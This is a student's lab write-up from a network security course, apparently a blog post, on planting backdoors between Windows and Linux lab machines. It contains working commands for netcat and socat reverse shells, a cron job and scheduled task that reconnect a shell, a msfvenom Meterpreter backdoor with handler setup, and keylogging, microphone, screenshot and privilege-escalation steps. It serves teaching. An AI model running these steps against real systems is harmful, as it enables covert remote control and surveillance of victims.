Exp2 后门原理与实践 20154308张珊珊

一.基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 我们在安装常用应用软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统

2.例举你知道的后门如何启动起来(win及linux)的方式?

  • windows:直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序
  • linux:设置了cron启动,在到达规定的时间时后门启动

3.Meterpreter有哪些给你映像深刻的功能?

  • 可以获取目标主机摄像头!虽然后面的实验中我并没有成功,但是看别人的博客里都成功了,还是很可怕的
  • 可以截图,万一一个涉密机被装了后门程序,那秘密文件岂不是被轻而易举地泄露了
  • 其实它的每一个功能都让人感到害怕

4.如何发现自己有系统有没有被安装后门?

  • 一般的后门程序都会被杀毒软件查杀,比如实验中的后门程序就被电脑管家消灭了,能被查杀的后门是不是不多了?
  • 对于厉害的后门,可以及时监控进程是否异常,数据流异常以及开机自启动项,看看有没有消耗cpu特别大的进程。

二.常用后门工具实验过程

2.1 Windows获得Linux Shell

1.在Win下,先使用ipconfig指令查看本机IP:172.30.6.22

2.使用ncat.exe程序监听4308端口:ncat -l -p 4308

3.Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh命令去连接Win的4308端口。

4.连接成功后就可以在Win的cmd窗口中输入Linux的命令,此时已经获取了Linux的shell。

2.2 Linux获得Win Shell

1.在Linux下使用ifconfig命令查看本地主机IP:172.30.5.236

2.在Linux使用ncat.exe程序监听4308端口:nc -l -p 4308

3.Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去连接Linux的4308端口:ncat.exe -e cmd.exe 172.30.5.236 4308

4.连接成功后就可以在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。

两个步骤类似,只是执行命令的主机相反。

2.3使用nc传输数据

netcat根据课上所学简单来讲,就是利用tcp、udp连接进行基本的数据收发,在两台主机之间传输字符文件之类的,所以我们在这里尝试用它在win和linux之间做一个后门。

1.Win使用ncat.exe -l 4308命令监听本机的4308端口。

2.Linux使用nc 172.30.5.22 4308命令去连接Win的4308端口,其中的ip地址应为linux的ip地址。

3.连接成功后即可传输数据,在linux终端输入的字符可以出现在win终端,而在win终端输入的字符也会出现在linux终端。如上图

4.也可以利用如下命令将文件里的内容作为输入,写入到另一台主机的文件里

nc -l 1234 > filename.out

nc host.example.com 1234 < filename.in

2.4 nc定时启动

1.ncat.exe -l -p 4308 win运行ncat.exe监听4308端口。(忘记截图)

2.crontab -e Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。因为是第一次编辑,所以会提示选择编辑器,我们选择3,利用最基本的vim编辑器进行编辑。
(再次忘记截图,因为当时卡在了怎么编辑文件,看到了某一个学姐的博客之后才知道,还是基础知识掌握得不牢固,很不牢固,但是会加油的)

a进入编辑状态,在文件最后一行添加18 * * * * /bin/netcat 172.30.6.22 4308 -e /bin/sh 表示在每个小时的第18分钟反向连接win的4308端口。

添加完后:wq存盘退出,配置即生效。

3.当时间到了18分时,win已经获得了linux的shell,可以输入ls等指令,而在18分以前,终端里是不会有任何反应的。

2.5 使用socat获取主机shell

1.在Win系统下,打开控制面板->系统和安全->管理工具->任务计划程序,创建任务,填写任务名称20154308

新建一个触发器,设置如下

2.下载socat软件,下载地址[https://gitee.com/wildlinux/NetSec/attach_files](老师的讲义里给的附件)

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4308 exec:cmd.exe,pty,stderr

3.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:

4.此时,在linux终端输入指令socat - tcp:172.30.6.22:4308,这里的第一个参数-代表标准的输入输出,第二个流连接到Wind主机的4308端口,此时可以发现已经成功获得了一个win shell:

2.6体验Meterpreter的功能

1.生成后门程序msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.5.236 LPORT=4308 -f exe > 20154308_backdoor.exe

2.将生成的后门程序传送到Win主机上ncat.exe -lv 4308 > 20154308_backdoor.exe

3.在linux上使用msfconsole指令进入msf控制台,进行一系列如下设置

msfconsole进入msf(图案好像会不一样,但是不太清楚是啥)

use exploit/multi/handler进入handler模式

set payload windows/meterpreter/reverse_tcp设置payload

set LHOST 172.30.5.236设置LHOST

set LPORT 4308设置LPORT

show options查看当前信息状态

exploitmsf开始监听

4.20154308_backdoor.exe在win上打开后门程序

5.然后可以发现linux已经获得了Win shell

6.接下来就可以利用msf做一些有趣的事情

record_mic录音

webcam_snap拍照(可惜没有成功)

screenshot截屏

使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功

三.实验遇到的问题

3.1 后门程序传送到win后,win无法打开后门程序

  • 稍微一想就会知道肯定是杀毒软件的作用。所以打开虚拟机上的电脑管家,可以看到我们所生成的后门程序20154308_backdoor.exe被查杀了
  • 所以我们选择恢复,然后就可以在指定文件夹里找到这个程序了
  • 可以正常打开后门程序了

3.2 无法使用摄像头进行偷拍,很是难过,检查过设备管理器,确实是没有摄像头设备

  • 尝试过在虚拟机->可移动设备->Chiconyxxxxxxxxx这里选择连接主机,然而我的虚拟机里并没有chicony这个选项可以让我连接主机。失败
  • 尝试过在物理机的计算机管理->服务里启用所有与虚拟机相关的服务,然而并没有反应。失败
  • 最后一个方法,我没骨气的选择了放弃

四.实验总结

  • 有趣但是很恐怖,可能我在做实验的时候就被人监视着一切(但是好像也没什么人会特地去监视我哈)
  • 杀毒软件确实还是有一点用的,不知道在后面了解到免杀实验后我还会不会这么想
  • 这次的实验是比较简单?我写完博客就能掌握一些东西了,不像上次做完实验,其实还是云里雾里,上了实验课之后才差不多明白一点。是我变厉害了?哈哈哈哈
  • 昨天听一个学长说,网络对抗这门课虽然课上听不懂(是真的听不懂,一节课下来不知道自己听到了什么),但是课下对照着实验指导书和别人写的博客,实际操作还是蛮有意思的。我现在不仅是觉得有意思,更觉得自己能从实际操作中掌握到一点点点点知识了,没白学吧这个课,就是希望以后在课堂上能再听懂多一点东西
posted @ 2018-03-29 10:14  20154308张珊珊  阅读(163)  评论(0编辑  收藏